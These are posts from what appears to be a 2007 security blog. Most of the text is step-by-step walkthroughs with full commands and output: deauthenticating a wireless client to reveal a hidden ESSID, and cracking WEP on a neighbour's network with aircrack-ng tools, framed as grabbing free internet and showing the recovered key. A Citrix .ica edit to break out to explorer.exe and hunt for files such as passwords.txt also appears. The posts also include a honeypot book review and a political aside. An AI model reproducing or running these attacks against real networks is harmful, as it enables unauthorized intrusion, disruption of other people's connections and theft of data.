Monday, November 26, 2007

Deauthing users to get the ESSID using aircrack-ng

Sometimes airodump-ng wont show you the ESSID of an access point. you'll need the ESSID so you can do the fake authentication attack.

root@segfault:/home/cg/eric-g# airodump-ng ath0 --bssid 00:14:BF:9D:BA:DA -c 11
CH 11 ][ Elapsed: 9 s ][ 2007-11-25 23:43

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:BF:9D:BA:DA 13 37 98 15 2 11 48 WEP WEP (length: 7)

BSSID STATION PWR Lost Packets Probes

00:14:BF:9D:BA:DA 00:11:95:BD:77:79 -1 0 1
00:14:BF:9D:BA:DA 00:17:3F:74:80:D6 6 11 7


the solution to that is to deauth a client on the network, when they re-authenticate the ESSID should present itself.


root@segfault:/home/cg/casa# aireplay-ng -0 10 -a 00:14:BF:9D:BA:DA -c 00:17:3F:74:80:D6 ath0
23:45:50 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:51 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:52 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:53 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:55 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:56 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:57 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:58 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:59 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:46:01 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]



watch your airodump output and the ESSID should change from length:# to the actual ESSID

CH 11 ][ Elapsed: 1 min ][ 2007-11-25 23:46

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:BF:9D:BA:DA 12 83 1093 122 5 11 48 WEP WEP OPN general

BSSID STATION PWR Lost Packets Probes

00:14:BF:9D:BA:DA 00:17:3F:74:80:D6 5 0 651
00:14:BF:9D:BA:DA 00:11:95:BD:77:79 -1 0 2

our ESSID is "general"

-CG


Saturday, November 24, 2007

Cracking WEP with aircrack-ng

So i'll have to apologize for a severe lack of posts, i just moved from Texas to Northern VA and its been hell finding a place to rent. We finally found a place but the cable man doesnt come till monday, now that wont do i need my net fix. thankfully there are plenty of wifi networks i can see from inside the house...


######################
# Step 1: Target a specific network #
######################

root@segfault:/home/cg/eric-g# airodump-ng --bssid 00:18:F8:F4:CF:E4 -c 9 ath2 -w eric-g
CH 9 ][ Elapsed: 4 mins ][ 2007-11-21 23:08

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:F8:F4:CF:E4 21 21 2428 26251 0 9 48 WEP WEP OPN eric-G

BSSID STATION PWR Lost Packets Probes

00:18:F8:F4:CF:E4 06:19:7E:8E:72:87 23 0 34189

###########################
# Step 2: Associate with the target network #
###########################


root@segfault:/home/cg/eric-g# aireplay-ng -1 600 -e eric-G -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:53:23 Waiting for beacon frame (BSSID: 00:18:F8:F4:CF:E4)
22:53:23 Sending Authentication Request
22:53:23 Authentication successful
22:53:23 Sending Association Request
22:53:24 Association successful :-)
22:53:39 Sending keep-alive packet
22:53:54 Sending keep-alive packet
22:54:09 Sending keep-alive packet
22:54:24 Sending keep-alive packet
22:54:39 Sending keep-alive packet
22:54:54 Sending keep-alive packet
22:55:09 Sending keep-alive packet
22:55:24 Sending keep-alive packet
22:55:39 Sending keep-alive packet
22:55:54 Sending keep-alive packet
22:55:54 Got a deauthentication packet!
22:55:57 Sending Authentication Request
22:55:59 Sending Authentication Request
22:55:59 Authentication successful
22:55:59 Sending Association Request
22:55:59 Association successful :-)
22:56:14 Sending keep-alive packet

***KEEP THAT RUNNING


####################
# Step 3: Generate Key Stream #
####################


root@segfault:/home/cg/eric-g# aireplay-ng -5 -b 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:59:41 Waiting for a data packet...
Read 873 packets...

Size: 352, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:18:F8:F4:CF:E2

0x0000: 0842 0000 0100 5e7f fffa 0018 f8f4 cfe4 .B....^........
0x0010: 0018 f8f4 cfe2 c0b5 121a 4600 0e18 0f3d ..........F....=
0x0020: bd80 8c41 de34 0437 8d2d c97f 2447 3d81 ...A.4.7.-.$G=.
0x0030: 9bdc 68da 06b2 18be 9cd6 9cb4 9443 8725 ..h..........C.%
0x0040: 87f6 9a14 1ff9 0cfa bd36 862e ec54 7215 .........6...Tr.
0x0050: 335b 4a91 d6a4 caae 5a58 a736 6230 87d9 3[J.....ZX.6b0..
0x0060: 4e14 7617 21c6 eda4 9b0d 3a00 0b4f 47ab N.v.!.....:..OG.
0x0070: a529 dedf 4c13 880c a1e6 37f7 50e6 599c .)..L.....7.P.Y.
0x0080: 0a4c 0b7f 24ae b019 ef2f 36b9 c499 8643 .L.$..../6....C
0x0090: 6592 5835 23e5 c8e9 d1b9 3d36 1fe5 ecfe e.X5#.....=6....
0x00a0: 510b 51ba 4fe4 e2ed d33b 0459 ca68 82b8 Q.Q.O....;.Y.h..
0x00b0: c856 ea70 829f c753 1614 290e d051 392f .V.p...S..)..Q9/
0x00c0: fa65 cbc6 c5f8 24b1 cdbd 94e5 08c3 2dd4 .e....$.......-.
0x00d0: 6e4b 983b dc82 b2cd b3f1 dab5 b816 6188 nK.;..........a.
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-1121-230028.cap
23:00:38 Data packet found!
23:00:38 Sending fragmented packet
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 384 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 1500 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
Saving keystream in fragment-1121-230038.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


######################
# Step 4: Build a valid ARP Packet #
######################


root@segfault:/home/cg/eric-g# packetforge-ng -0 -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 -k 255.255.255.255 -l 255.255.255.255 -w arp -y *.xor
Wrote packet to: arp


#########################
# Step 5: Generate your own arp traffic #
#########################


root@segfault:/home/cg/eric-g# aireplay-ng -2 -r arp -x 150 ath2

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 06:19:7E:8E:72:87

0x0000: 0841 0201 0018 f8f4 cfe4 0619 7e8e 7287 .A..........~.r.
0x0010: ffff ffff ffff 8001 1f1a 4600 c9d3 e5e7 ..........F.....
0x0020: d65a 6a63 0b51 bb60 8390 a8b4 947d 456f .Zjc.Q.`.....}Eo
0x0030: 3a05 25b2 7464 7db7 c49b d38a f789 822c :.%.td}........,
0x0040: 83a8 93c5 ....

Use this packet ? y

Saving chosen packet in replay_src-1121-230224.cap
You should also start airodump-ng to capture replies. **we started airodump on step1


at this point your airodump capture should really be filling up with a ton of data packets as we do the arp replay attack


################
# Step 6: Start cracking #
################


we can run aircrack while the arp replay attack is ongoing, so you dont have to stop the arp replay or fake authentication sessions.

cg@segfault:~/eric-g$ aircrack-ng -z eric-g-05.cap
Opening eric-g-05.cap
Read 64282 packets.

# BSSID ESSID Encryption

1 00:18:F8:F4:CF:E4 eric-G WEP (21102 IVs)

Choosing first network as target.

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21397 ivs.

Aircrack-ng 0.9.1


[00:00:11] Tested 78120/140000 keys (got 22918 IVs)

KB depth byte(vote)
0 3/ 5 34( 111) 70( 109) 42( 107) 2C( 106) B9( 106) E3( 106)
1 1/ 14 34( 115) 92( 110) 35( 109) 53( 109) 33( 108) CD( 107)
2 6/ 18 91( 114) E7( 114) 21( 111) 0E( 110) 88( 109) C6( 109)
3 2/ 31 37( 109) 80( 109) 5F( 108) 92( 108) 9E( 108) 9B( 107)
4 0/ 2 29( 129) 55( 114) AD( 112) 6A( 111) BB( 110) C1( 110)

KEY FOUND! [ 70:34:91:37:29 ]
Decrypted correctly: 100%


Total time to crack, 4 minutes ;-)

-CG

Wednesday, November 14, 2007

Politics: Yahoo & China

So I've been kinda keeping up with the whole Yahoo giving up a journalist name to the Chinese government (at least what is on CNN) and that guy getting 10 years in prision.

if you are unfamiliar with it:
http://www.cnn.com/2007/US/10/16/yahoo.congress/index.html
http://www.cnn.com/2007/POLITICS/11/06/congress.yahoo.ap/index.html
http://www.cnn.com/2007/WORLD/asiapcf/11/13/yahoo.china/index.html

here is the short version:
"Shi Tao got in trouble three years ago, when the Chinese government told journalists not to report on the Tiananmen Square anniversary. He forwarded the notice to human rights groups. The regime then pressured Yahoo to give up the account holder who did that. Yahoo complied."

I caught a bit of the senate testimony online and it was the CEO getting his ass chewed by the senators basically saying he was a complete traitor to the US and what not.

Now, I am pro-American and anti communist but here are some things I thought about after reading the above articles and seeing it on TV:

-did the CEO personally give up the information freely or did one of Yahoo's employees in China do it after a direct warrant type request from the Chinese government. Do all of those types of requests go thru any type legal or ethics review? or any review by the CEO? -I doubt it.

-what was the extent of the data given. did they ask for an IP address? username? sign up info? etc. how much of that is given out normally and how sensitive is that information usually? did Yahoo know what the government wanted to do with it?

-if a foreign company operating inside the US was asked by the FBI to give up information about a US Citizen suspected of terrorism and was given a warrant to provide that information, they would be expected to give up that information...yes? i think they would be expected to do just that. isnt that the same thing?

-expectation of privacy is low i think on those free email services. anytime another entity stores and sends your email for you, there shouldnt be much of expectation of REAL privacy. if you dont own/control the server and cant encrypt your emails or data then privacy is at a minimum. In a place like China, being stealthy and careful must be at a premium especially if you are doing anti-govt type activities.

-if you want some real scary stuff check out Mark Rasch's current article on security focus on email privacy:

http://www.securityfocus.com/columnists/456

things might not be so different after all.

thoughts?

-CG

Saturday, November 10, 2007

Virtual Honeypots: From Botnet Tracking to Intrusion Detection Book Review

Virtual Honeypots: From Botnet Tracking to Intrusion Detection
by Niels Provos(Author), Thorsten Holz (Author)

5 stars

Honeypots made easy


Books that put institutional knowledge, or knowledge that people in the industry know but its not written down anywhere, are few and far between. This book succeeds in taking that institutional knowledge and putting it into a readable, functional, and well-organized format.

Before I get into the chapter play by play stuff, let me just say that Chapter 8, Client Honeypots, is worth the price of the book. Client-side attacks are were everything is moving to and the days of a remote OS 0day or quickly fading away. One of the hardest things to automate and teach is client-side attacks because it used to involve user interaction (someone actually clicking on the email, link, .exe), but with the client honeypots they discuss in the book you can automate clicking on emails, clicking on links, spidering websites, and running the executables you download from the sites. You can also monitor your honeypot for changes after running the executable, good stuff!

Most of the other reviewers said you can skip the introductory material, and you could, but its better than the usual "beginning of the book/background" material. The book starts with honeypot/honeynet introduction. Chapter 2 covers high interaction honeypots to include a good chunk of information on VMware and your other "virtual" options including User Mode Linux and Argos. Chapter 3 covers Low interaction honeypots like LaBrea, GHH, and PHP.HoP for your web based low interaction honeypots. Chapters 4 & 5 are a healthy dose of honeyd. Chapter 6 is collecting malware with Nepenthes and Honeytrap. Chapter 7 covers Hybrid systems. Chapter 8 is, as discussed, Client Honeypots. Chapter 9 is on detecting low and high interaction honeypots. Chapter 10 contains Case Studies, Chapter 11 is Tracking Botnets, and Chapter 12 closes out the book with analyzing malware with CWSandbox.

My only gripes about the book were that they failed to talk about persistent versus non-persistent modes in VMware and there as no discussion of identifying VMware and Sebek in Windows. Configuring your virtual machine how you like it, then setting it to non-persistent is a great way to let users or attackers do whatever they want to the OS. The changes survive an OS reboot but if you reboot the virtual machine it goes back to the original state, very handy. The other gripe was a shortage of material on detection of Sebek on Windows hosts, its covered in-depth for Linux though. Detecting VMware and some other honeypot type tools like Sebek in Windows is fairly easy. Simply querying for their respective registry keys usually does the job :-)

Overall, a good book. Its useful, up-to-date, and relevant to security today.

Wednesday, November 7, 2007

Citrix Hacking

**This post is late, i realize the "buzz" about the topic is way past but...

Over on the gnucitizen blog (if you dont read that blog you should, its got tons of web app sec info) awhile back there was some cool CITRIX hacking going on

http://www.gnucitizen.org/blog/hacking-citrix-the-forceful-way
http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor

anyway, its there (this post is late but hey, i was moving to Washington D.C.) about editing the .ica files to get a shell on the remote box. Most of the .ica files want to funnel you into the single application that they want you to run, this application is listed in the ica file like:

InitialProgram=#PlanVue yakyakyak

but you can simply change that value to whatever you want. now, you might go, hey let me get my cmd.exe immediately but frankly a cmd.exe shell doesnt give you alot of options. of more interest is explorer.exe which will basically give you that little "My Computer" pop up, from there you can take a peek at all the computers on the network via network neighborhood or just poke around for info that probably shouldnt be available to everyone. since hacking is rapidly moving from possessing the root shell to possessing the data its a great way to do some digging into the network.


so to get that nifty explorer.exe box we just need to change it to:

InitialProgram=explorer.exe

and we go from



to



Big fun!

now, you'll still be running as the citrix client so it shouldn't (better not be) any kind of account with privs but you might be able to take a look at that passwords.txt file and get everything you need :-)

-CG

Monday, November 5, 2007

Hacker Defender Rootkit article published in hakin9 magazine

I'm happy to announce that my Hacker Defender Article was published in this month's hakin9 magazine.

http://www.hakin9.org/en/haking/issues/6_2007.html



Premium LSO Members can see it on the site, and it will get posted on carnal0wnage after the magazine has done its run in the book stores.

Big thanks to MC for the 0day for the client side demo in the article

its basically a how-to on using the rootkit since i found the readme to not be enough detail to actually deploy it. we use metasploit to pop a meterpreter shell using a client side exploit, upload the rootkit, then we change some registry keys, show how Hacker Defender hides processes and we play with the backdoor client. Hopefully its useful...we'll let the hate mail decide :-)